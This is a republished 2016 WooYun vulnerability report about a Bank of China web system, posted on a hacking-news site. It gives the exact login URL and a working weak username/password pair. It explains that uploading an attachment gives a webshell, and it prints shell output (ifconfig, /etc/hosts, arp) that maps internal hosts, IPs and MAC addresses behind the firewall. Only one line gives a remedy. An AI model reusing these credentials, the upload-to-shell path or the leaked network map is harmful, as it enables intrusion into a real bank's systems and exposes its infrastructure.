记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)

2016-06-19 05:55

#1 发现方法

利用通用的弱口令检测脚本,简单而又高效且杀伤力巨大

http://zone.wooyun.org/content/22529

http://zone.wooyun.org/content/21962

中国姓名排行TOP500(数据统计来自国家人口数据库)

http://zone.wooyun.org/content/18372

#2 漏洞描述

https://e.boc.cn/ehome/property/frame/sign.do

发现1个弱口令:wangwei:000000

社区管理功能,添加附件,即可获得shell

fujian.png



漏洞证明:

https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp

webshell.jpg





code 区域
[/]$ /sbin/ifconfig -a

eth0 Link encap:Ethernet HWaddr 00:50:56:9A:72:2C

inet addr:21.123.47.151 Bcast:21.123.47.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:127879201 errors:0 dropped:0 overruns:0 frame:0

TX packets:117334178 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:22666975632 (21.1 GiB) TX bytes:32615347620 (30.3 GiB)



eth1 Link encap:Ethernet HWaddr 00:50:56:9A:14:C4

inet addr:10.123.47.151 Bcast:10.123.47.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:51273711 errors:0 dropped:0 overruns:0 frame:0

TX packets:46856648 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:12233542012 (11.3 GiB) TX bytes:9912431273 (9.2 GiB)



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:65536 Metric:1

RX packets:238664440 errors:0 dropped:0 overruns:0 frame:0

TX packets:238664440 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:24040429146 (22.3 GiB) TX bytes:24040429146 (22.3 GiB)







[/]$ cat /etc/hosts

127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4

::1 localhost localhost.localdomain localhost6 localhost6.localdomain6

21.123.47.146P1EZECAP01

21.123.47.147P1EZECAP02

21.123.47.148P1EZECAP03

21.123.47.149P1EZECAP04

21.123.47.150P1EZECAP05

21.123.47.151P1EZECAP06

21.123.47.152P1EZECAP07

21.123.47.153P1EZECAP08

10.123.47.146P1EZECAP01_gpfs

10.123.47.147P1EZECAP02_gpfs

10.123.47.148P1EZECAP03_gpfs

10.123.47.149P1EZECAP04_gpfs

10.123.47.150P1EZECAP05_gpfs

10.123.47.151P1EZECAP06_gpfs

10.123.47.152P1EZECAP07_gpfs

10.123.47.153P1EZECAP08_gpfs

21.122.32.116 ZabbixServer

21.123.102.88 nbu3media1

21.123.102.89 nbu3media2

21.123.102.90 nbu3master





[/]$ /sbin/arp -a

? (21.123.47.161) at 00:50:56:9a:3d:95 [ether] on eth0

P1EZECAP05 (21.123.47.150) at 00:50:56:9a:00:55 [ether] on eth0

? (21.123.47.1) at 00:00:0c:9f:f0:2f [ether] on eth0

P1EZECAP01_gpfs (10.123.47.146) at 00:50:56:9a:62:66 [ether] on eth1

P1EZECAP05_gpfs (10.123.47.150) at 00:50:56:9a:79:c7 [ether] on eth1

P1EZECAP03_gpfs (10.123.47.148) at 00:50:56:9a:31:0c [ether] on eth1

P1EZECAP04_gpfs (10.123.47.149) at 00:50:56:9a:6f:8f [ether] on eth1

P1EZECAP07 (21.123.47.152) at 00:50:56:9a:49:62 [ether] on eth0

P1EZECAP08_gpfs (10.123.47.153) at 00:50:56:9a:7b:08 [ether] on eth1

P1EZECAP07_gpfs (10.123.47.152) at 00:50:56:9a:05:f1 [ether] on eth1

P1EZECAP02_gpfs (10.123.47.147) at 00:50:56:9a:56:89 [ether] on eth1





[/]$

修复方案:

补弱口令,补上传漏洞

知识来源: www.wooyun.org/bugs/wooyun-2016-0204059

阅读:103206 | 评论:0 | 标签:防火墙

想收藏或者和大家分享这篇好文章→复制链接地址

“中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云